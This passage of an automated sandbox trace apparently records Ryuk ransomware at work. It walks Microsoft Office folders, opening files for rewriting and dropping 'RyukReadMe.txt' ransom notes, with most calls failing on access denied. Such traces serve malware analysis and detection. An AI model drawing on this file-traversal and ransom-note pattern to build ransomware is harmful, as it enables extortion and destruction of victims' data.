dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.557] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.557] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.557] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.557] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.557] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.558] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.558] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.558] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.558] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.558] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD", dwFileAttributes=0x80) returned 0 [0136.559] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winschd.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.559] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.559] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.559] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.559] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.559] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV.HXS", dwFileAttributes=0x80) returned 0 [0136.559] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.559] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.559] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.559] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.560] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.560] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.560] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.560] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.560] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.562] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.562] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.562] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.562] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.562] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.562] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.562] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.563] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.563] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.563] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.563] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.563] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.563] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.563] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.563] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.563] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.564] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.HXS", dwFileAttributes=0x80) returned 0 [0136.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.564] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.564] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.564] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.564] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.564] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.565] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.565] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.565] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.565] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.565] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.565] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.565] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.565] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.565] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.566] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.566] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.566] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.566] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.566] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.566] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.566] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.566] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.567] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.567] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.567] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.567] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.567] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL", dwFileAttributes=0x80) returned 0 [0136.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\workflow.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.567] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.567] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.567] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.567] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.567] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.567] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.567] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.567] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.568] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WZCNFLCT.CHM", dwFileAttributes=0x80) returned 0 [0136.568] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WZCNFLCT.CHM" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wzcnflct.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.568] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.568] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.568] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.568] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.568] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL", dwFileAttributes=0x80) returned 0 [0136.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XFUNC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xfunc.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.569] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.569] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.569] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.569] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.569] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Xlate_Complete.xsn", dwFileAttributes=0x80) returned 0 [0136.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Xlate_Complete.xsn" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlate_complete.xsn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.570] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.570] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.570] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.570] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.570] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Xlate_Init.xsn", dwFileAttributes=0x80) returned 0 [0136.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Xlate_Init.xsn" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlate_init.xsn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.571] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.571] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.571] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.571] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.571] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.571] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.571] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.571] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.571] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLMACRO.CHM", dwFileAttributes=0x80) returned 0 [0136.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLMACRO.CHM" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlmacro.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.572] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.572] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.572] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.572] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.572] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.572] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.572] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XMLSDK5.CHM", dwFileAttributes=0x80) returned 0 [0136.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XMLSDK5.CHM" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xmlsdk5.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.573] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.573] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.573] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0136.573] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0136.573] SetLastError (dwErrCode=0x0) [0136.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.573] GetLastError () returned 0x5 [0136.573] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.573] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.573] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.573] SetLastError (dwErrCode=0x0) [0136.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.573] GetLastError () returned 0x5 [0136.573] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.573] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.574] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1036\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0136.574] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.574] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.574] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.575] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL", dwFileAttributes=0x80) returned 0 [0136.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\office14\\1036\\mso.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.575] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.575] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.575] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0136.575] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0136.575] SetLastError (dwErrCode=0x0) [0136.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1036\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1036\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.575] GetLastError () returned 0x5 [0136.575] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.575] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.575] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.575] SetLastError (dwErrCode=0x0) [0136.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.575] GetLastError () returned 0x5 [0136.575] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.575] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.576] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\3082\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0136.576] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.576] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.576] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.577] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL", dwFileAttributes=0x80) returned 0 [0136.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\office14\\3082\\mso.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.577] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.577] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.577] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0136.577] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0136.577] SetLastError (dwErrCode=0x0) [0136.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\3082\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\3082\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.577] GetLastError () returned 0x5 [0136.577] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.577] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.577] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.577] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.577] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.577] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.577] SetLastError (dwErrCode=0x0) [0136.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.577] GetLastError () returned 0x5 [0136.577] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.578] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.578] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0136.578] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.578] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.578] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.579] 